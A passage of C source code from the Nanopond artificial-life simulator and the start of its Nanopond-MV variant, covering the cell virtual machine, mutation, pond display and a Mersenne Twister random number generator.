lastTotalViableReplicators = totalViableReplicators;
/* Reset per-report stat counters */
for(x=0;x<sizeof(statCounters);++x)
((uint8_t *)&statCounters)[x] = (uint8_t)0;
}
/**
* Dumps the genome of a cell to a file.
*
* @param file Destination
* @param cell Source
*/
static void dumpCell(FILE *file, struct Cell *cell)
{
uintptr_t wordPtr,shiftPtr,inst,stopCount,i;
if (cell->energy&&(cell->generation > 2)) {
wordPtr = 0;
shiftPtr = 0;
stopCount = 0;
for(i=0;i<POND_DEPTH;++i) {
inst = (cell->genome[wordPtr] >> shiftPtr) & 0xf;
/* Four STOP instructions in a row is considered the end.
* The probability of this being wrong is *very* small, and
* could only occur if you had four STOPs in a row inside
* a LOOP/REP pair that's always false. In any case, this
* would always result in our *underestimating* the size of
* the genome and would never result in an overestimation. */
fprintf(file,"%x",(unsigned int)inst);
if (inst == 0xf) { /* STOP */
if (++stopCount >= 4)
break;
} else stopCount = 0;
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
}
}
}
fprintf(file,"\n");
}
static inline struct Cell *getNeighbor(const uintptr_t x,const uintptr_t y,const uintptr_t dir)
{
/* Space is toroidal; it wraps at edges */
switch(dir) {
case N_LEFT:
return (x) ? &pond[x-1][y] : &pond[POND_SIZE_X-1][y];
case N_RIGHT:
return (x < (POND_SIZE_X-1)) ? &pond[x+1][y] : &pond[0][y];
case N_UP:
return (y) ? &pond[x][y-1] : &pond[x][POND_SIZE_Y-1];
case N_DOWN:
return (y < (POND_SIZE_Y-1)) ? &pond[x][y+1] : &pond[x][0];
}
return &pond[x][y]; /* This should never be reached */
}
static inline int accessAllowed(struct Cell *const c2,const uintptr_t c1guess,int sense)
{
/* Access permission is more probable if they are more similar in sense 0,
* and more probable if they are different in sense 1. Sense 0 is used for
* "negative" interactions and sense 1 for "positive" ones. */
return sense ? (((getRandom() & 0xf) >= BITS_IN_FOURBIT_WORD[(c2->genome[0] & 0xf) ^ (c1guess & 0xf)])||(!c2->parentID)) : (((getRandom() & 0xf) <= BITS_IN_FOURBIT_WORD[(c2->genome[0] & 0xf) ^ (c1guess & 0xf)])||(!c2->parentID));
}
static inline uint8_t getColor(struct Cell *c)
{
uintptr_t i,j,word,sum,opcode,skipnext;
if (c->energy) {
switch(colorScheme) {
case KINSHIP:
/*
* Kinship color scheme by <NAME>
*
* For cells of generation > 1, saturation and value are set to maximum.
* Hue is a hash-value with the property that related genomes will have
* similar hue (but of course, as this is a hash function, totally
* different genomes can also have a similar or even the same hue).
* Therefore the difference in hue should to some extent reflect the grade
* of "kinship" of two cells.
*/
if (c->generation > 1) {
sum = 0;
skipnext = 0;
for(i=0;i<POND_DEPTH_SYSWORDS&&(c->genome[i] != ~((uintptr_t)0));++i) {
word = c->genome[i];
for(j=0;j<SYSWORD_BITS/4;++j,word >>= 4) {
/* We ignore 0xf's here, because otherwise very similar genomes
* might get quite different hash values in the case when one of
* the genomes is slightly longer and uses one more maschine
* word. */
opcode = word & 0xf;
if (skipnext)
skipnext = 0;
else {
if (opcode != 0xf)
sum += opcode;
if (opcode == 0xc) /* 0xc == XCHG */
skipnext = 1; /* Skip "operand" after XCHG */
}
}
}
/* For the hash-value use a wrapped around sum of the sum of all
* commands and the length of the genome. */
return (uint8_t)((sum % 192) + 64);
}
return 0;
case LINEAGE:
/*
* Cells with generation > 1 are color-coded by lineage.
*/
return (c->generation > 1) ? (((uint8_t)c->lineage) | (uint8_t)1) : 0;
case MAX_COLOR_SCHEME:
/* ... never used... to make compiler shut up. */
break;
}
}
return 0; /* Cells with no energy are black */
}
volatile int exitNow = 0;
static void *run(void *targ)
{
const uintptr_t threadNo = (uintptr_t)targ;
uintptr_t x,y,i;
uintptr_t clock = 0;
/* Buffer used for execution output of candidate offspring */
uintptr_t outputBuf[POND_DEPTH_SYSWORDS];
/* Miscellaneous variables used in the loop */
uintptr_t currentWord,wordPtr,shiftPtr,inst,tmp;
struct Cell *pptr,*tmpptr;
/* Virtual machine memory pointer register (which
* exists in two parts... read the code below...) */
uintptr_t ptr_wordPtr;
uintptr_t ptr_shiftPtr;
/* The main "register" */
uintptr_t reg;
/* Which way is the cell facing? */
uintptr_t facing;
/* Virtual machine loop/rep stack */
uintptr_t loopStack_wordPtr[POND_DEPTH];
uintptr_t loopStack_shiftPtr[POND_DEPTH];
uintptr_t loopStackPtr;
/* If this is nonzero, we're skipping to matching REP */
/* It is incremented to track the depth of a nested set
* of LOOP/REP pairs in false state. */
uintptr_t falseLoopDepth;
#ifdef USE_SDL
SDL_Event sdlEvent;
const uintptr_t sdlPitch = screen->pitch;
#endif
/* If this is nonzero, cell execution stops. This allows us
* to avoid the ugly use of a goto to exit the loop. :) */
int stop;
/* Main loop */
while (!exitNow) {
/* Increment clock and run reports periodically */
/* Clock is incremented at the start, so it starts at 1 */
++clock;
if ((threadNo == 0)&&(!(clock % REPORT_FREQUENCY))) {
doReport(clock);
/* SDL display is also refreshed every REPORT_FREQUENCY */
#ifdef USE_SDL
while (SDL_PollEvent(&sdlEvent)) {
if (sdlEvent.type == SDL_QUIT) {
fprintf(stderr,"[QUIT] Quit signal received!\n");
exitNow = 1;
} else if (sdlEvent.type == SDL_MOUSEBUTTONDOWN) {
switch (sdlEvent.button.button) {
case SDL_BUTTON_LEFT:
fprintf(stderr,"[INTERFACE] Genome of cell at (%d, %d):\n",sdlEvent.button.x, sdlEvent.button.y);
dumpCell(stderr, &pond[sdlEvent.button.x][sdlEvent.button.y]);
break;
case SDL_BUTTON_RIGHT:
colorScheme = (colorScheme + 1) % MAX_COLOR_SCHEME;
fprintf(stderr,"[INTERFACE] Switching to color scheme \"%s\".\n",colorSchemeName[colorScheme]);
for (y=0;y<POND_SIZE_Y;++y) {
for (x=0;x<POND_SIZE_X;++x)
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(&pond[x][y]);
}
break;
}
}
}
SDL_BlitSurface(screen, NULL, winsurf, NULL);
SDL_UpdateWindowSurface(window);
#endif /* USE_SDL */
}
/* Introduce a random cell somewhere with a given energy level */
/* This is called seeding, and introduces both energy and
* entropy into the substrate. This happens every INFLOW_FREQUENCY
* clock ticks. */
if (!(clock % INFLOW_FREQUENCY)) {
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
pptr = &pond[x][y];
#ifdef USE_PTHREADS_COUNT
pthread_mutex_lock(&(pptr->lock));
#endif
pptr->ID = cellIdCounter;
pptr->parentID = 0;
pptr->lineage = cellIdCounter;
pptr->generation = 0;
#ifdef INFLOW_RATE_VARIATION
pptr->energy += INFLOW_RATE_BASE + (getRandom() % INFLOW_RATE_VARIATION);
#else
pptr->energy += INFLOW_RATE_BASE;
#endif /* INFLOW_RATE_VARIATION */
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
pptr->genome[i] = getRandom();
++cellIdCounter;
/* Update the random cell on SDL screen if viz is enabled */
#ifdef USE_SDL
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(pptr);
#endif /* USE_SDL */
#ifdef USE_PTHREADS_COUNT
pthread_mutex_unlock(&(pptr->lock));
#endif
}
/* Pick a random cell to execute */
i = getRandom();
x = i % POND_SIZE_X;
y = ((i / POND_SIZE_X) >> 1) % POND_SIZE_Y;
pptr = &pond[x][y];
/* Reset the state of the VM prior to execution */
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
outputBuf[i] = ~((uintptr_t)0); /* ~0 == 0xfffff... */
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
reg = 0;
loopStackPtr = 0;
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
facing = 0;
falseLoopDepth = 0;
stop = 0;
/* We use a currentWord buffer to hold the word we're
* currently working on. This speeds things up a bit
* since it eliminates a pointer dereference in the
* inner loop. We have to be careful to refresh this
* whenever it might have changed... take a look at
* the code. :) */
currentWord = pptr->genome[0];
/* Keep track of how many cells have been executed */
statCounters.cellExecutions += 1.0;
/* Core execution loop */
while ((pptr->energy)&&(!stop)) {
/* Get the next instruction */
inst = (currentWord >> shiftPtr) & 0xf;
/* Randomly frob either the instruction or the register with a
* probability defined by MUTATION_RATE. This introduces variation,
* and since the variation is introduced into the state of the VM
* it can have all manner of different effects on the end result of
* replication: insertions, deletions, duplications of entire
* ranges of the genome, etc. */
if ((getRandom() & 0xffffffff) < MUTATION_RATE) {
tmp = getRandom(); /* Call getRandom() only once for speed */
if (tmp & 0x80) /* Check for the 8th bit to get random boolean */
inst = tmp & 0xf; /* Only the first four bits are used here */
else reg = tmp & 0xf;
}
/* Each instruction processed costs one unit of energy */
--pptr->energy;
/* Execute the instruction */
if (falseLoopDepth) {
/* Skip forward to matching REP if we're in a false loop. */
if (inst == 0x9) /* Increment false LOOP depth */
++falseLoopDepth;
else if (inst == 0xa) /* Decrement on REP */
--falseLoopDepth;
} else {
/* If we're not in a false LOOP/REP, execute normally */
/* Keep track of execution frequencies for each instruction */
statCounters.instructionExecutions[inst] += 1.0;
switch(inst) {
case 0x0: /* ZERO: Zero VM state registers */
reg = 0;
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
facing = 0;
break;
case 0x1: /* FWD: Increment the pointer (wrap at end) */
if ((ptr_shiftPtr += 4) >= SYSWORD_BITS) {
if (++ptr_wordPtr >= POND_DEPTH_SYSWORDS)
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
}
break;
case 0x2: /* BACK: Decrement the pointer (wrap at beginning) */
if (ptr_shiftPtr)
ptr_shiftPtr -= 4;
else {
if (ptr_wordPtr)
--ptr_wordPtr;
else ptr_wordPtr = POND_DEPTH_SYSWORDS - 1;
ptr_shiftPtr = SYSWORD_BITS - 4;
}
break;
case 0x3: /* INC: Increment the register */
reg = (reg + 1) & 0xf;
break;
case 0x4: /* DEC: Decrement the register */
reg = (reg - 1) & 0xf;
break;
case 0x5: /* READG: Read into the register from genome */
reg = (pptr->genome[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x6: /* WRITEG: Write out from the register to genome */
pptr->genome[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
pptr->genome[ptr_wordPtr] |= reg << ptr_shiftPtr;
currentWord = pptr->genome[wordPtr]; /* Must refresh in case this changed! */
break;
case 0x7: /* READB: Read into the register from buffer */
reg = (outputBuf[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x8: /* WRITEB: Write out from the register to buffer */
outputBuf[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
outputBuf[ptr_wordPtr] |= reg << ptr_shiftPtr;
break;
case 0x9: /* LOOP: Jump forward to matching REP if register is zero */
if (reg) {
if (loopStackPtr >= POND_DEPTH)
stop = 1; /* Stack overflow ends execution */
else {
loopStack_wordPtr[loopStackPtr] = wordPtr;
loopStack_shiftPtr[loopStackPtr] = shiftPtr;
++loopStackPtr;
}
} else falseLoopDepth = 1;
break;
case 0xa: /* REP: Jump back to matching LOOP if register is nonzero */
if (loopStackPtr) {
--loopStackPtr;
if (reg) {
wordPtr = loopStack_wordPtr[loopStackPtr];
shiftPtr = loopStack_shiftPtr[loopStackPtr];
currentWord = pptr->genome[wordPtr];
/* This ensures that the LOOP is rerun */
continue;
}
}
break;
case 0xb: /* TURN: Turn in the direction specified by register */
facing = reg & 3;
break;
case 0xc: /* XCHG: Skip next instruction and exchange value of register with it */
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
}
tmp = reg;
reg = (pptr->genome[wordPtr] >> shiftPtr) & 0xf;
pptr->genome[wordPtr] &= ~(((uintptr_t)0xf) << shiftPtr);
pptr->genome[wordPtr] |= tmp << shiftPtr;
currentWord = pptr->genome[wordPtr];
break;
case 0xd: /* KILL: Blow away neighboring cell if allowed with penalty on failure */
tmpptr = getNeighbor(x,y,facing);
if (accessAllowed(tmpptr,reg,0)) {
if (tmpptr->generation > 2)
++statCounters.viableCellsKilled;
/* Filling first two words with 0xfffff... is enough */
tmpptr->genome[0] = ~((uintptr_t)0);
tmpptr->genome[1] = ~((uintptr_t)0);
tmpptr->ID = cellIdCounter;
tmpptr->parentID = 0;
tmpptr->lineage = cellIdCounter;
tmpptr->generation = 0;
++cellIdCounter;
} else if (tmpptr->generation > 2) {
tmp = pptr->energy / FAILED_KILL_PENALTY;
if (pptr->energy > tmp)
pptr->energy -= tmp;
else pptr->energy = 0;
}
break;
case 0xe: /* SHARE: Equalize energy between self and neighbor if allowed */
tmpptr = getNeighbor(x,y,facing);
if (accessAllowed(tmpptr,reg,1)) {
#ifdef USE_PTHREADS_COUNT
pthread_mutex_lock(&(tmpptr->lock));
#endif
if (tmpptr->generation > 2)
++statCounters.viableCellShares;
tmp = pptr->energy + tmpptr->energy;
tmpptr->energy = tmp / 2;
pptr->energy = tmp - tmpptr->energy;
#ifdef USE_PTHREADS_COUNT
pthread_mutex_unlock(&(tmpptr->lock));
#endif
}
break;
case 0xf: /* STOP: End execution */
stop = 1;
break;
}
}
/* Advance the shift and word pointers, and loop around
* to the beginning at the end of the genome. */
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
currentWord = pptr->genome[wordPtr];
}
}
/* Copy outputBuf into neighbor if access is permitted and there
* is energy there to make something happen. There is no need
* to copy to a cell with no energy, since anything copied there
* would never be executed and then would be replaced with random
* junk eventually. See the seeding code in the main loop above. */
if ((outputBuf[0] & 0xff) != 0xff) {
tmpptr = getNeighbor(x,y,facing);
#ifdef USE_PTHREADS_COUNT
pthread_mutex_lock(&(tmpptr->lock));
#endif
if ((tmpptr->energy)&&accessAllowed(tmpptr,reg,0)) {
/* Log it if we're replacing a viable cell */
if (tmpptr->generation > 2)
++statCounters.viableCellsReplaced;
tmpptr->ID = ++cellIdCounter;
tmpptr->parentID = pptr->ID;
tmpptr->lineage = pptr->lineage; /* Lineage is copied in offspring */
tmpptr->generation = pptr->generation + 1;
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
tmpptr->genome[i] = outputBuf[i];
}
#ifdef USE_PTHREADS_COUNT
pthread_mutex_unlock(&(tmpptr->lock));
#endif
}
/* Update the neighborhood on SDL screen to show any changes. */
#ifdef USE_SDL
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(pptr);
if (x) {
((uint8_t *)screen->pixels)[(x-1) + (y * sdlPitch)] = getColor(&pond[x-1][y]);
if (x < (POND_SIZE_X-1))
((uint8_t *)screen->pixels)[(x+1) + (y * sdlPitch)] = getColor(&pond[x+1][y]);
else ((uint8_t *)screen->pixels)[y * sdlPitch] = getColor(&pond[0][y]);
} else {
((uint8_t *)screen->pixels)[(POND_SIZE_X-1) + (y * sdlPitch)] = getColor(&pond[POND_SIZE_X-1][y]);
((uint8_t *)screen->pixels)[1 + (y * sdlPitch)] = getColor(&pond[1][y]);
}
if (y) {
((uint8_t *)screen->pixels)[x + ((y-1) * sdlPitch)] = getColor(&pond[x][y-1]);
if (y < (POND_SIZE_Y-1))
((uint8_t *)screen->pixels)[x + ((y+1) * sdlPitch)] = getColor(&pond[x][y+1]);
else ((uint8_t *)screen->pixels)[x] = getColor(&pond[x][0]);
} else {
((uint8_t *)screen->pixels)[x + ((POND_SIZE_Y-1) * sdlPitch)] = getColor(&pond[x][POND_SIZE_Y-1]);
((uint8_t *)screen->pixels)[x + sdlPitch] = getColor(&pond[x][1]);
}
#endif /* USE_SDL */
}
return (void *)0;
}
/**
* Main method
*
* @param argc Number of args
* @param argv Argument array
*/
int main(int argc,char **argv)
{
uintptr_t i,x,y;
/* Seed and init the random number generator */
prngState[0] = (uint64_t)time(NULL);
srand(time(NULL));
prngState[1] = (uint64_t)rand();
/* Reset per-report stat counters */
for(x=0;x<sizeof(statCounters);++x)
((uint8_t *)&statCounters)[x] = (uint8_t)0;
/* Set up SDL if we're using it */
#ifdef USE_SDL
if (SDL_Init(SDL_INIT_VIDEO) < 0 ) {
fprintf(stderr,"*** Unable to init SDL: %s ***\n",SDL_GetError());
exit(1);
}
atexit(SDL_Quit);
window = SDL_CreateWindow("nanopond", SDL_WINDOWPOS_CENTERED, SDL_WINDOWPOS_CENTERED, POND_SIZE_X, POND_SIZE_Y, 0);
if (!window) {
fprintf(stderr, "*** Unable to create SDL window: %s ***\n", SDL_GetError());
exit(1);
}
winsurf = SDL_GetWindowSurface(window);
if (!winsurf) {
fprintf(stderr, "*** Unable to get SDL window surface: %s ***\n", SDL_GetError());
exit(1);
}
screen = SDL_CreateRGBSurface(0, POND_SIZE_X, POND_SIZE_Y, 8, 0, 0, 0, 0);
if (!screen) {
fprintf(stderr, "*** Unable to create SDL window surface: %s ***\n", SDL_GetError());
exit(1);
}
/* Set palette entries to match the default SDL 1.2.15 palette */
{
Uint8 r[8] = {0, 36, 73, 109, 146, 182, 219, 255};
Uint8 g[8] = {0, 36, 73, 109, 146, 182, 219, 255};
Uint8 b[4] = {0, 85, 170, 255};
int curColor = 0;
for(unsigned int i = 0; i < 8; ++i) {
for(unsigned int j = 0; j < 8; ++j) {
for(unsigned int k = 0; k < 4; ++k) {
SDL_Color color = {r[i], g[j], b[k], 255};
SDL_SetPaletteColors(screen->format->palette, &color, curColor, 1);
curColor++;
}
}
}
}
#endif /* USE_SDL */
/* Clear the pond and initialize all genomes
* to 0xffff... */
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
pond[x][y].ID = 0;
pond[x][y].parentID = 0;
pond[x][y].lineage = 0;
pond[x][y].generation = 0;
pond[x][y].energy = 0;
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
pond[x][y].genome[i] = ~((uintptr_t)0);
#ifdef USE_PTHREADS_COUNT
pthread_mutex_init(&(pond[x][y].lock),0);
#endif
}
}
#ifdef USE_PTHREADS_COUNT
pthread_t threads[USE_PTHREADS_COUNT];
for(i=1;i<USE_PTHREADS_COUNT;++i)
pthread_create(&threads[i],0,run,(void *)i);
run((void *)0);
for(i=1;i<USE_PTHREADS_COUNT;++i)
pthread_join(threads[i],(void **)0);
#else
run((void *)0);
#endif
#ifdef USE_SDL
SDL_FreeSurface(screen);
SDL_DestroyWindow(window);
#endif /* USE_SDL */
return 0;
}
<file_sep>/* *********************************************************************** */
/* */
/* Nanopond-MV version 1.0 -- Multivalent nanopond */
/* Copyright (C) 2005 <NAME> - http://www.greythumb.com/people/api */
/* */
/* This program is free software; you can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation; either version 2 of the License, or */
/* (at your option) any later version. */
/* */
/* This program is distributed in the hope that it will be useful, */
/* but WITHOUT ANY WARRANTY; without even the implied warranty of */
/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */
/* GNU General Public License for more details. */
/* */
/* You should have received a copy of the GNU General Public License */
/* along with this program; if not, write to the Free Software */
/* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110 USA */
/* */
/* *********************************************************************** */
/* ----------------------------------------------------------------------- */
/* Tunable parameters */
/* ----------------------------------------------------------------------- */
/* Iteration to stop at. Comment this out to run forever. */
/* #define STOP_AT 150000000000ULL */
/* Frequency of comprehensive reports-- lower values will provide more
* info while slowing down the simulation. Higher values will give less
* frequent updates. */
/* This is also the frequency of screen refreshes if SDL is enabled. */
#define REPORT_FREQUENCY 100000
/* Uncomment this to save a BMP image of the screen every
* REPORT_FREQUENCY ticks. Requires that SDL (see below) be enabled. */
#define SAVE_BMPS 1
/* Frequency at which to dump all viable replicators (generation > 2)
* to a file named <clock>.dump in the current directory. Comment
* out to disable. The cells are dumped in hexadecimal, which is
* semi-human-readable if you look at the big switch() statement
* in the main loop to see what instruction is signified by each
* four-bit value. */
#define DUMP_FREQUENCY 100000000
/* Mutation rate -- range is from 0 (none) to 0xffffffff (all mutations!) */
/* To get it from a float probability from 0.0 to 1.0, multiply it by
* 4294967295 (0xffffffff) and round. */
#define MUTATION_RATE 21475
/* How frequently should random cells be introduced? */
#define INFLOW_FREQUENCY 100
/* Size of pond in X and Y dimensions. */
#define POND_SIZE_X 640
#define POND_SIZE_Y 480
/* Depth of pond in four-bit codons -- this is the maximum
* genome size. This *must* be a multiple of 16! */
#define POND_DEPTH 512
/* Base and variation for energy of each valence in pond */
#define POND_ENERGY_BASE 50000
/* #define POND_ENERGY_VARIATION 10000 */
/* Define this to use SDL. To use SDL, you must have SDL headers
* available and you must link with the SDL library when you compile. */
/* Comment this out to compile without SDL visualization support. */
#define USE_SDL 1
/* Default color scheme */
#define DEFAULT_COLOR_SCHEME VALENCE
/* ----------------------------------------------------------------------- */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef USE_SDL
#ifdef _MSC_VER
#include <SDL.h>
#else
#include <SDL/SDL.h>
#endif /* _MSC_VER */
#endif /* USE_SDL */
/* ----------------------------------------------------------------------- */
/* This is the Mersenne Twister by <NAME> and <NAME> */
/* http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/MT2002/emt19937ar.html */
/* ----------------------------------------------------------------------- */
/* A few very minor changes were made by me - Adam */
/*
A C-program for MT19937, with initialization improved 2002/1/26.
Coded by <NAME> and <NAME>.
Before using, initialize the state by using init_genrand(seed)
or init_by_array(init_key, key_length).
Copyright (C) 1997 - 2002, <NAME> and <NAME>,
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The names of its contributors may not be used to endorse or promote
products derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Any feedback is very welcome.
http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/emt.html
email: <EMAIL> (remove space)
*/
/* Period parameters */
#define N 624
#define M 397
#define MATRIX_A 0x9908b0dfUL /* constant vector a */
#define UPPER_MASK 0x80000000UL /* most significant w-r bits */
#define LOWER_MASK 0x7fffffffUL /* least significant r bits */
static unsigned long mt[N]; /* the array for the state vector */
static int mti=N+1; /* mti==N+1 means mt[N] is not initialized */
/* initializes mt[N] with a seed */
static void init_genrand(unsigned long s)
{
mt[0]= s & 0xffffffffUL;
for (mti=1; mti<N; mti++) {
mt[mti] =
(1812433253UL * (mt[mti-1] ^ (mt[mti-1] >> 30)) + mti);
/* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */
/* In the previous versions, MSBs of the seed affect */
/* only MSBs of the array mt[]. */
/* 2002/01/09 modified by <NAME> */
mt[mti] &= 0xffffffffUL;
/* for >32 bit machines */
}
}
/* generates a random number on [0,0xffffffff]-interval */
static inline uint32_t genrand_int32()
{
uint32_t y;
static uint32_t mag01[2]={0x0UL, MATRIX_A};
/* mag01[x] = x * MATRIX_A for x=0,1 */
if (mti >= N) { /* generate N words at one time */
int kk;
for (kk=0;kk<N-M;kk++) {
y = (mt[kk]&UPPER_MASK)|(mt[kk+1]&LOWER_MASK);
mt[kk] = mt[kk+M] ^ (y >> 1) ^ mag01[y & 0x1UL];
}
for (;kk<N-1;kk++) {
y = (mt[kk]&UPPER_MASK)|(mt[kk+1]&LOWER_MASK);
mt[kk] = mt[kk+(M-N)] ^ (y >> 1) ^ mag01[y & 0x1UL];
}
y = (mt[N-1]&UPPER_MASK)|(mt[0]&LOWER_MASK);
mt[N-1] = mt[M-1] ^ (y >> 1) ^ mag01[y & 0x1UL];
mti = 0;
}
y = mt[mti++];
/* Tempering */
y ^= (y >> 11);
y ^= (y << 7) & 0x9d2c5680UL;
y ^= (y << 15) & 0xefc60000UL;
y ^= (y >> 18);
return y;
}
/* ----------------------------------------------------------------------- */
/* Size of genome instructions in bits */
#define INSTRUCTION_WORD_SIZE 4
/* Bit mask for instruction words */
#define INSTRUCTION_MASK 0xf
/* Instructions per machine size word */
#define INSTRUCTIONS_PER_UINTPTR ((sizeof(uintptr_t) * 8) / INSTRUCTION_WORD_SIZE)
/* Execution start position in instruction words */
#define EXEC_START_POSITION 2
/* Constants representing neighbors in the 2D grid. */
#define N_LEFT 0
#define N_RIGHT 1
#define N_UP 2
#define N_DOWN 3
#ifdef USE_SDL
/* 16 primary colors plus one extra (brown), initialized in main() */
static uint8_t w3cPrimaryColors[17];
#endif /* USE_SDL */
/**
* Structure for a cell in the pond
*/
struct Cell
{
/* Globally unique cell ID */
uint64_t ID;
/* Generations start at 0 and are incremented from there. */
/* Generations > 2 are considered "viable replicators." */
uintptr_t generation;
/* Energy level of this cell for each type of energy */
uintptr_t energy[16];
/* Memory space for cell genome */
uintptr_t genome[POND_DEPTH / INSTRUCTIONS_PER_UINTPTR];
};
/* The pond is a 2D array of cells */
struct Cell pond[POND_SIZE_X][POND_SIZE_Y];
/* Currently selected color scheme */
enum { CHECKSUM,LOGO,VALENCE,MAX_COLOR_SCHEME } colorScheme = DEFAULT_COLOR_SCHEME;
const char *colorSchemeName[MAX_COLOR_SCHEME] = { "CHECKSUM", "LOGO", "VALENCE" };
/* Macro for getting byte x from genome */
#define genomeAt(g,x) ((g[(x) / INSTRUCTIONS_PER_UINTPTR] >> (((x) % INSTRUCTIONS_PER_UINTPTR) * INSTRUCTION_WORD_SIZE)) & INSTRUCTION_MASK)
/* Function for setting the value of byte x in the genome */
static inline void genomeSet(uintptr_t *g,uintptr_t x,uintptr_t v)
{
const uintptr_t idx = x / INSTRUCTIONS_PER_UINTPTR;
const uintptr_t shift = (x % INSTRUCTIONS_PER_UINTPTR) * INSTRUCTION_WORD_SIZE;
g[idx] &= ~(((uintptr_t)INSTRUCTION_MASK) << shift);
g[idx] |= (v & INSTRUCTION_MASK) << shift;
}
/* Macro for determining whether a cell with a given generation is a
* probable viable replicator. Defining this as a macro makes code
* easier to read. */
#define isViableReplicator(g) ((g) > 2)
/**
* Get a random number
*
* @return Random number
*/
static inline uintptr_t getRandom()
{
/* A good optimizing compiler should optimize this 'if' out */
/* This is to make it work on 64-bit boxes */
if (sizeof(uintptr_t) == 8)
return (uintptr_t)((((uint64_t)genrand_int32()) << 32) ^ ((uint64_t)genrand_int32()));
else return (uintptr_t)genrand_int32();
}
/* Get the valence of a genome */
#define valence(g) (genomeAt(g,1))
/* Get the logo of an 8-bit codon */
#define logo(g) (genomeAt(g,2))
/* Macro to calculate the corresponding valence to a valence value */
#define correspondingValence(v) ((v) ^ 0xf)
/**
* Structure for keeping some running tally type statistics
*/
struct PerReportStatCounters
{
/* Counts for the number of times each instruction was
* executed since the last report. */
double instructionExecutions[16];
/* Number of cells executed since last report */
double cellExecutions;
/* Number of successful SHARE operations */
uint64_t viableCellShares;
};
/* Global statistics counters */
struct PerReportStatCounters statCounters;
/**
* Output a line of comma-seperated statistics data
*
* @param clock Current clock
*/
static void doReport(const uint64_t clock)
{
static uint64_t lastTotalViableReplicators = 0;
uintptr_t x,y;
uint64_t totalViableReplicators = 0ULL;
uint64_t maxGeneration = 0ULL;
uint64_t g = 0ULL;
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
g = (uint64_t)pond[x][y].generation;
if (isViableReplicator(g))
++totalViableReplicators;
if (g > maxGeneration)
maxGeneration = g;
}
}
/* Look here to get the columns in the CSV output */
/* The first five are here and are self-explanatory */
printf("%llu,%llu,%llu,%llu",
clock,
totalViableReplicators,
maxGeneration,
statCounters.viableCellShares
);
/* The next 16 are the average frequencies of execution for each
* instruction per cell execution. */
double totalMetabolism = 0.0;
for(x=0;x<16;++x) {
totalMetabolism += statCounters.instructionExecutions[x];
printf(",%.4f",(statCounters.cellExecutions > 0.0) ? (statCounters.instructionExecutions[x] / statCounters.cellExecutions) : 0.0);
}
/* The last column is the average metabolism per cell execution */
printf(",%.4f\n",(statCounters.cellExecutions > 0.0) ? (totalMetabolism / statCounters.cellExecutions) : 0.0);
fflush(stdout);
if ((lastTotalViableReplicators > 0)&&(totalViableReplicators == 0))
fprintf(stderr,"[EVENT] Viable replicators have gone extinct. Please reserve a moment of silence.\n");
else if ((lastTotalViableReplicators == 0)&&(totalViableReplicators > 0))
fprintf(stderr,"[EVENT] Viable replicators have appeared!\n");
lastTotalViableReplicators = totalViableReplicators;
/* Reset per-report stat counters */
memset((void *)&statCounters,0,sizeof(statCounters));
}
/**
